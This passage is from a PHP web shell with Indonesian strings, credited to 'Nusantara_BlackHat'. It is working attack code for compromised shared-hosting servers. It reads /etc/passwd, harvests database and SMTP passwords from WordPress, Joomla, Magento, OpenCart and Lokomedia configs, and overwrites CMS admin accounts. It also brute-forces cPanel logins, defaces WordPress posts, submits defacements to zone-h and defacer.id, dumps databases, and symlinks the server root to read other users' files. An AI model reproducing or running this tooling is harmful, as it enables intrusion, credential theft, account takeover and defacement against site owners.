819. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
820. while($passwd = fgets($etc)) {
821. if($passwd == '' || !$etc) {
822. echo "<font color=red>Can't read /etc/passwd</font>";
823. } else {
824. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
825. foreach($user_jumping[1] as $user_idx_jump) {
826. $user_jumping_dir = "/home/$user_idx_jump/public_html";
827. if(is_readable($user_jumping_dir)) {
828. $i++;
829. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=silver>$user_jumping_dir</font></a>";
830. if(is_writable($user_jumping_dir)) {
831. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=silver>$user_jumping_dir</font></a>";
832. }
833. echo $jrw;
834. if(function_exists('posix_getpwuid')) {
835. $domain_jump = file_get_contents("/etc/named.conf");
836. if($domain_jump == '') {
837. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
838. } else {
839. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
840. foreach($domains_jump[1] as $dj) {
841. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
842. $user_jumping_url = $user_jumping_url['name'];
843. if($user_jumping_url == $user_idx_jump) {
844. echo " => ( <u>$dj</u> )<br>";
845. break;
846. }
847. }
848. }
849. } else {
850. echo "<br>";
851. }
852. }
853. }
854. }
855. }
856. if($i == 0) {
857. } else {
858. echo "<br>Total ada ".$i." Kamar di ".$ip;
859. }
860. echo "</pre>";
861. }
862. echo "</div>";
863. } elseif($_GET['do'] == 'auto_edit_user') {
864. if($_POST['hajar']) {
865. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
866. echo "username atau password harus lebih dari 6 karakter";
867. } else {
868. $user_baru = $_POST['user_baru'];
869. $pass_baru = md5($_POST['pass_baru']);
870. $conf = $_POST['config_dir'];
871. $scan_conf = scandir($conf);
872. foreach($scan_conf as $file_conf) {
873. if(!is_file("$conf/$file_conf")) continue;
874. $config = file_get_contents("$conf/$file_conf");
875. if(preg_match("/JConfig|joomla/",$config)) {
876. $dbhost = ambilkata($config,"host = '","'");
877. $dbuser = ambilkata($config,"user = '","'");
878. $dbpass = ambilkata($config,"password = '","'");
879. $dbname = ambilkata($config,"db = '","'");
880. $dbprefix = ambilkata($config,"dbprefix = '","'");
881. $prefix = $dbprefix."users";
882. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
883. $db = mysql_select_db($dbname);
884. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
885. $result = mysql_fetch_array($q);
886. $id = $result['id'];
887. $site = ambilkata($config,"sitename = '","'");
888. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
889. echo "Config => ".$file_conf."<br>";
890. echo "CMS => Joomla<br>";
891. if($site == '') {
892. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
893. } else {
894. echo "Sitename => $site<br>";
895. }
896. if(!$update OR !$conn OR !$db) {
897. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
898. } else {
899. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
900. }
901. mysql_close($conn);
902. } elseif(preg_match("/WordPress/",$config)) {
903. $dbhost = ambilkata($config,"DB_HOST', '","'");
904. $dbuser = ambilkata($config,"DB_USER', '","'");
905. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
906. $dbname = ambilkata($config,"DB_NAME', '","'");
907. $dbprefix = ambilkata($config,"table_prefix = '","'");
908. $prefix = $dbprefix."users";
909. $option = $dbprefix."options";
910. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
911. $db = mysql_select_db($dbname);
912. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
913. $result = mysql_fetch_array($q);
914. $id = $result[ID];
915. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
916. $result2 = mysql_fetch_array($q2);
917. $target = $result2[option_value];
918. if($target == '') {
919. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
920. } else {
921. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
922. }
923. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
924. echo "Config => ".$file_conf."<br>";
925. echo "CMS => Wordpress<br>";
926. echo $url_target;
927. if(!$update OR !$conn OR !$db) {
928. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
929. } else {
930. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
931. }
932. mysql_close($conn);
933. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
934. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
935. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
936. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
937. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
938. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
939. $prefix = $dbprefix."admin_user";
940. $option = $dbprefix."core_config_data";
941. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
942. $db = mysql_select_db($dbname);
943. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
944. $result = mysql_fetch_array($q);
945. $id = $result[user_id];
946. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
947. $result2 = mysql_fetch_array($q2);
948. $target = $result2[value];
949. if($target == '') {
950. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
951. } else {
952. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
953. }
954. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
955. echo "Config => ".$file_conf."<br>";
956. echo "CMS => Magento<br>";
957. echo $url_target;
958. if(!$update OR !$conn OR !$db) {
959. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
960. } else {
961. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
962. }
963. mysql_close($conn);
964. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
965. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
966. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
967. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
968. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
969. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
970. $prefix = $dbprefix."user";
971. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
972. $db = mysql_select_db($dbname);
973. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
974. $result = mysql_fetch_array($q);
975. $id = $result[user_id];
976. $target = ambilkata($config,"HTTP_SERVER', '","'");
977. if($target == '') {
978. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
979. } else {
980. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
981. }
982. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
983. echo "Config => ".$file_conf."<br>";
984. echo "CMS => OpenCart<br>";
985. echo $url_target;
986. if(!$update OR !$conn OR !$db) {
987. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
988. } else {
989. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
990. }
991. mysql_close($conn);
992. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
993. $dbhost = ambilkata($config,'server = "','"');
994. $dbuser = ambilkata($config,'username = "','"');
995. $dbpass = ambilkata($config,'password = "','"');
996. $dbname = ambilkata($config,'database = "','"');
997. $prefix = "users";
998. $option = "identitas";
999. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1000. $db = mysql_select_db($dbname);
1001. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1002. $result = mysql_fetch_array($q);
1003. $target = $result[alamat_website];
1004. if($target == '') {
1005. $target2 = $result[url];
1006. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1007. if($target2 == '') {
1008. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1009. } else {
1010. $cek_login3 = file_get_contents("$target2/adminweb/");
1011. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1012. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1013. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1014. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1015. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1016. } else {
1017. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1018. }
1019. }
1020. } else {
1021. $cek_login = file_get_contents("$target/adminweb/");
1022. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1023. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1024. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1025. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1026. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1027. } else {
1028. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1029. }
1030. }
1031. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1032. echo "Config => ".$file_conf."<br>";
1033. echo "CMS => Lokomedia<br>";
1034. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1035. echo $url_target2;
1036. } else {
1037. echo $url_target;
1038. }
1039. if(!$update OR !$conn OR !$db) {
1040. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1041. } else {
1042. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1043. }
1044. mysql_close($conn);
1045. }
1046. }
1047. }
1048. } else {
1049. echo "<center>
1050. <h1>Auto Edit User Config</h1>
1051. <form method='post'>
1052. DIR Config: <br>
1053. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1054. Set User & Pass: <br>
1055. <input type='text' name='user_baru' value='L0LZ666H05T' placeholder='user_baru'><br>
1056. <input type='text' name='pass_baru' value='L0LZ666H05T' placeholder='pass_baru'><br>
1057. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1058. </form>
1059. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1060. ";
1061. }
1062. } elseif($_GET['do'] == 'cpanel') {
1063. if($_POST['crack']) {
1064. $usercp = explode("rn", $_POST['user_cp']);
1065. $passcp = explode("rn", $_POST['pass_cp']);
1066. $i = 0;
1067. foreach($usercp as $ucp) {
1068. foreach($passcp as $pcp) {
1069. if(@mysql_connect('localhost', $ucp, $pcp)) {
1070. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1071. } else {
1072. $_SESSION[$ucp] = "1";
1073. $_SESSION[$pcp] = "1";
1074. if($ucp == '' || $pcp == '') {
1075.  
1076. } else {
1077. $i++;
1078. if(function_exists('posix_getpwuid')) {
1079. $domain_cp = file_get_contents("/etc/named.conf");
1080. if($domain_cp == '') {
1081. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1082. } else {
1083. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1084. foreach($domains_cp[1] as $dj) {
1085. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1086. $user_cp_url = $user_cp_url['name'];
1087. if($user_cp_url == $ucp) {
1088. $dom = "<a href='http://$dj/' target='_blank'><font color=blue>$dj</font></a>";
1089. break;
1090. }
1091. }
1092. }
1093. } else {
1094. $dom = "<font color=red>function is Disable by system</font>";
1095. }
1096. echo "username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>) domain ($dom)<br>";
1097. }
1098. }
1099. }
1100. }
1101. }
1102. if($i == 0) {
1103. } else {
1104. echo "<br>sukses nyolong ".$i." Cpanel by <font color=blue>Nusantara_BlackHat</font>";
1105. }
1106. } else {
1107. echo "<center>
1108. <form method='post'>
1109. USER: <br>
1110. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1111. $_usercp = fopen("/etc/passwd","r");
1112. while($getu = fgets($_usercp)) {
1113. if($getu == '' || !$_usercp) {
1114. echo "<font color=red>Can't read /etc/passwd</font>";
1115. } else {
1116. preg_match_all("/(.*?):x:/", $getu, $u);
1117. foreach($u[1] as $user_cp) {
1118. if(is_dir("/home/$user_cp/public_html")) {
1119. echo "$user_cpn";
1120. }
1121. }
1122. }
1123. }
1124. echo "</textarea><br>
1125. PASS: <br>
1126. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1127. function cp_pass($dir) {
1128. $pass = "";
1129. $dira = scandir($dir);
1130. foreach($dira as $dirb) {
1131. if(!is_file("$dir/$dirb")) continue;
1132. $ambil = file_get_contents("$dir/$dirb");
1133. if(preg_match("/WordPress/", $ambil)) {
1134. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."n";
1135. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1136. $pass .= ambilkata($ambil,"password = '","'")."n";
1137. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1138. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."n";
1139. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1140. $pass .= ambilkata($ambil,'password = "','"')."n";
1141. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1142. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."n";
1143. } elseif(preg_match("/client/", $ambil)) {
1144. preg_match("/password=(.*)/", $ambil, $pass1);
1145. $pass .= $pass1[1]."n";
1146. if(preg_match('/"/', $pass1[1])) {
1147. $pass1[1] = str_replace('"', "", $pass1[1]);
1148. $pass .= $pass1[1]."n";
1149. }
1150. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1151. $pass .= ambilkata($ambil,"db_password = '","'")."n";
1152. }
1153. }
1154. echo $pass;
1155. }
1156. $cp_pass = cp_pass($dir);
1157. echo $cp_pass;
1158. echo "</textarea><br>
1159. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1160. </form>
1161. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1162. }
1163. } elseif($_GET['do'] == 'smtp') {
1164. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1165. function scj($dir) {
1166. $dira = scandir($dir);
1167. foreach($dira as $dirb) {
1168. if(!is_file("$dir/$dirb")) continue;
1169. $ambil = file_get_contents("$dir/$dirb");
1170. $ambil = str_replace("$", "", $ambil);
1171. if(preg_match("/JConfig|joomla/", $ambil)) {
1172. $smtp_host = ambilkata($ambil,"smtphost = '","'");
1173. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1174. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1175. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1176. $smtp_port = ambilkata($ambil,"smtpport = '","'");
1177. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1178. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1179. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1180. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1181. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1182. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1183. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1184. }
1185. }
1186. }
1187. $smpt_hunter = scj($dir);
1188. echo $smpt_hunter;
1189. } elseif($_GET['do'] == 'auto_wp') {
1190. if($_POST['hajar']) {
1191. $title = htmlspecialchars($_POST['new_title']);
1192. $pn_title = str_replace(" ", "-", $title);
1193. if($_POST['cek_edit'] == "Y") {
1194. $script = $_POST['edit_content'];
1195. } else {
1196. $script = $title;
1197. }
1198. $conf = $_POST['config_dir'];
1199. $scan_conf = scandir($conf);
1200. foreach($scan_conf as $file_conf) {
1201. if(!is_file("$conf/$file_conf")) continue;
1202. $config = file_get_contents("$conf/$file_conf");
1203. if(preg_match("/WordPress/", $config)) {
1204. $dbhost = ambilkata($config,"DB_HOST', '","'");
1205. $dbuser = ambilkata($config,"DB_USER', '","'");
1206. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1207. $dbname = ambilkata($config,"DB_NAME', '","'");
1208. $dbprefix = ambilkata($config,"table_prefix = '","'");
1209. $prefix = $dbprefix."posts";
1210. $option = $dbprefix."options";
1211. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1212. $db = mysql_select_db($dbname);
1213. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1214. $result = mysql_fetch_array($q);
1215. $id = $result[ID];
1216. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1217. $result2 = mysql_fetch_array($q2);
1218. $target = $result2[option_value];
1219. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1220. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1221. echo "<div style='margin: 5px auto;'>";
1222. if($target == '') {
1223. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1224. } else {
1225. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1226. }
1227. if(!$update OR !$conn OR !$db) {
1228. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1229. } else {
1230. echo "<font color=lime>sukses di ganti.</font><br>";
1231. }
1232. echo "</div>";
1233. mysql_close($conn);
1234. }
1235. }
1236. } else {
1237. echo "<center>
1238. <h1>Auto Edit Title+Content WordPress</h1>
1239. <form method='post'>
1240. DIR Config: <br>
1241. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1242. Set Title: <br>
1243. <input type='text' name='new_title' value='HACKED BY L0LZ666H05T' placeholder='New Title'><br><br>
1244. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1245. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1246. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1247. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1248. </form>
1249. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1250. ";
1251. }
1252. } elseif($_GET['do'] == 'zoneh') {
1253. if($_POST['submit']) {
1254. $domain = explode("\r\n", $_POST['url']);
1255. $nick = $_POST['nick'];
1256. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1257. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1258. function zoneh($url,$nick) {
1259. $ch = curl_init("http://www.zone-h.com/notify/single");
1260. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1261. curl_setopt($ch, CURLOPT_POST, true);
1262. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1263. return curl_exec($ch);
1264. curl_close($ch);
1265. }
1266. foreach($domain as $url) {
1267. $zoneh = zoneh($url,$nick);
1268. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1269. echo "$url -> <font color=lime>OK</font><br>";
1270. } else {
1271. echo "$url -> <font color=red>ERROR</font><br>";
1272. }
1273. }
1274. } else {
1275. echo "<center><form method='post'>
1276. <u>Defacer</u>: <br>
1277. <input type='text' name='nick' size='50' value='Your Nick'><br>
1278. <u>Domains</u>: <br>
1279. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1280. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1281. </form>";
1282. }
1283. echo "</center>";
1284. }elseif($_GET['do'] == 'defacerid') {
1285. echo "<center><form method='POST' action=''>
1286. <br>
1287. <h1>Defacer ID Notify </h1>
1288. <br>
1289. Attacker : <br><input type='text' name='nick' placeholder='Limpid07'><br>
1290. Team : <br><input type='text' name='team' placeholder='GOPRESSXPLOITS'><br>
1291. Sites : <br><textarea name='sites' placeholder='http://nekopoi.site' style='width: 450px; height: 150px;'></textarea><br>
1292. <input type='submit' name='sikat' value='Submit!!'>
1293. </form>";
1294.  
1295.  
1296. error_reporting(0);
1297. $nick = $_POST['nick'];
1298. $team = $_POST['team'];
1299. $sikat = $_POST['sikat'];
1300. $url = explode("\r\n", $_POST['sites']);
1301. if($sikat){
1302. echo "Notify with nick [ ".$nick." ] and With Team [ ".$team." ] <p>";
1303. function defid($url,$nick,$team) {
1304. $ch = curl_init("https://defacer.id/archives/notify");
1305. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1306. curl_setopt($ch, CURLOPT_POST, true);
1307. curl_setopt($ch, CURLOPT_POSTFIELDS, "attacker=$nick&team=$team&poc=SQL Injection&url=$url");
1308. return curl_exec($ch);
1309. curl_close($ch);
1310. }
1311. foreach($url as $url) {
1312. $defid = defid($url,$nick,$team);
1313. if(preg_match('#<div class="success-box">#', $defid)) {
1314. echo "<font color='lime' size='3'>Ok -></font>".$url."<p>";
1315. } else {
1316. echo "<font color='red' size='3'>Error -></font> ".$url."<p>";
1317. }
1318. }
1319. }
1320. }
1321. /////////////////
1322. elseif($_GET['do'] == 'dbdump')
1323. {
1324. echo $head.'<p align="center">';
1325. echo '
1326. <center><form action method=post>
1327. <table width=371 class=tabnet >
1328. <tr><th colspan="2">Database Dump</th></tr>
1329. <tr>
1330. <td>Server </td>
1331. <td><input class="inputz" type=text name=server size=52></td></tr><tr>
1332. <td>Username</td>
1333. <td><input class="inputz" type=text name=username size=52></td></tr><tr>
1334. <td>Password</td>
1335. <td><input class="inputz" type=text name=password size=52></td></tr><tr>
1336. <td>DataBase Name</td>
1337. <td><input class="inputz" type=text name=dbname size=52></td></tr>
1338. <tr>
1339. <td>DB Type </td>
1340. <td><form method=post action="'.$me.'">
1341. <select class="inputz" name=method>
1342. <option value="gzip">Gzip</option>
1343. <option value="sql">Sql</option>
1344. </select>
1345. <input class="inputzbut" type=submit value=" Dump! " ></td></tr>
1346. </form></center></table></center>';
1347. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
1348. $date = date("Y-m-d");
1349. $dbserver = $_POST['server'];
1350. $dbuser = $_POST['username'];
1351. $dbpass = $_POST['password'];
1352. $dbname = $_POST['dbname'];
1353. $file = "Dump-$dbname-$date";
1354. $method = $_POST['method'];
1355. if ($method=='sql'){
1356. $file="Dump-$dbname-$date.sql";
1357. $fp=fopen($file,"w");
1358. }else{
1359. $file="Dump-$dbname-$date.sql.gz";
1360. $fp = gzopen($file,"w");
1361. }
1362. function write($data) {
1363. global $fp;
1364. if ($_POST['method']=='ssql'){
1365. fwrite($fp,$data);
1366. }else{
1367. gzwrite($fp, $data);
1368. }}
1369. mysql_connect ($dbserver, $dbuser, $dbpass);
1370. mysql_select_db($dbname);
1371. $tables = mysql_query ("SHOW TABLES");
1372. while ($i = mysql_fetch_array($tables)) {
1373. $i = $i['Tables_in_'.$dbname];
1374. $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
1375. write($create['Create Table'].";nn");
1376. $sql = mysql_query ("SELECT * FROM ".$i);
1377. if (mysql_num_rows($sql)) {
1378. while ($row = mysql_fetch_row($sql)) {
1379. foreach ($row as $j => $k) {
1380. $row[$j] = "'".mysql_escape_string($k)."'";
1381. }
1382. write("INSERT INTO $i VALUES(".implode(",", $row).");n");
1383. }
1384. }
1385. }
1386. if ($method=='ssql'){
1387. fclose ($fp);
1388. }else{
1389. gzclose($fp);}
1390. header("Content-Disposition: attachment; filename=" . $file);
1391. header("Content-Type: application/download");
1392. header("Content-Length: " . filesize($file));
1393. flush();
1394.  
1395. $fp = fopen($file, "r");
1396. while (!feof($fp))
1397. {
1398. echo fread($fp, 65536);
1399. flush();
1400. }
1401. fclose($fp);
1402. }
1403.  
1404. }
1405.  
1406. ///////////////////////////////////
1407. elseif($_GET['do'] == 'symlink') {
1408. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1409. $d0mains = @file("/etc/named.conf");
1410. ##httaces
1411. if($d0mains){
1412. @mkdir("L0LZ666H05T_sym",0777);
1413. @chdir("L0LZ666H05T_sym");
1414. @exe("ln -s / root");
1415. $file3 = 'Options Indexes FollowSymLinks
1416. DirectoryIndex n45ht.htm
1417. AddType text/plain .php
1418. AddHandler text/plain .php
1419. Satisfy Any';
1420. $fp3 = fopen('.htaccess','w');
1421. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
1422. echo "
1423. <table align=center border=1 style='width:70%;border-color:#333333;'>
1424. <tr>
1425. <td align=center>-<font size=3>-S. No.-</font></td>
1426. <td align=center>-<font size=3>-Domains-</font></td>
1427. <td align=center>-<font size=3>-Users-</font></td>
1428. <td align=center>-<font size=3>-Symlink-</font></td>
1429. </tr>";
1430. $dcount = 1;
1431. foreach($d0mains as $d0main){
1432. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
1433. flush();
1434. if(strlen(trim($domains[1][0])) > 2){
1435. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1436. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
1437. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
1438. <td>".$user['name']."</td>
1439. <td><a href='$full/L0LZ666H05T_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
1440. flush();
1441. $dcount++;}}}
1442. echo "</table>";
1443. }else{
1444. $TEST=@file('/etc/passwd');
1445. if ($TEST){
1446. @mkdir("L0LZ666H05T_sym",0777);
1447. @chdir("L0LZ666H05T_sym");
1448. exe("ln -s / root");
1449. $file3 = 'Options Indexes FollowSymLinks
1450. DirectoryIndex n45ht.htm
1451. AddType text/plain .php
1452. AddHandler text/plain .php
1453. Satisfy Any';
1454. $fp3 = fopen('.htaccess','w');
1455. $fw3 = fwrite($fp3,$file3);
1456. @fclose($fp3);
1457. echo "
1458. <table align=center border=1><tr>
1459. <td align=center><font size=3>-S. No.-</font></td>
1460. <td align=center><font size=3>-Users-</font></td>
1461. <td align=center><font size=3>-Symlink-</font></td></tr>";
1462. $dcount = 1;
1463. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
1464. while(!feof($file)){
1465. $s = fgets($file);
1466. $matches = array();
1467. $t = preg_match('//(.*?)://s', $s, $matches);
1468. $matches = str_replace("home/","",$matches[1]);
1469. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1470. continue;
1471. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
1472. <td align=center><font class=txt>" . $matches . "</td>";
1473. echo "<td align=center><font class=txt><a href=$full/L0LZ666H05T_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1474. $dcount++;}fclose($file);
1475. echo "</table>";}else{if($os != "Windows"){@mkdir("L0LZ666H05T_sym",0777);@chdir("L0LZ666H05T_sym");@exe("ln -s / root");$file3 = '
1476. Options Indexes FollowSymLinks
1477. DirectoryIndex n45ht.htm
1478. AddType text/plain .php
1479. AddHandler text/plain .php
1480. Satisfy Any
1481. ';
1482. $fp3 = fopen('.htaccess','w');
1483. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
1484. echo "
1485. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
1486. <table align=center border=1><tr>
1487. <td align=center><font size=3>ID</font></td>
1488. <td align=center><font size=3>Users</font></td>
1489. <td align=center><font size=3>Symlink</font></td></tr>";
1490. $temp = "";$val1 = 0;$val2 = 1000;
1491. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
1492. if ($uid)$temp .= join(':',$uid)."n";}
1493. echo '<br/>';$temp = trim($temp);$file5 =
1494. fopen("test.txt","w");
1495. fputs($file5,$temp);
1496. fclose($file5);$dcount = 1;$file =
1497. fopen("test.txt", "r") or exit("Unable to open file!");
1498. while(!feof($file)){$s = fgets($file);$matches = array();
1499. $t = preg_match('//(.*?)://s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
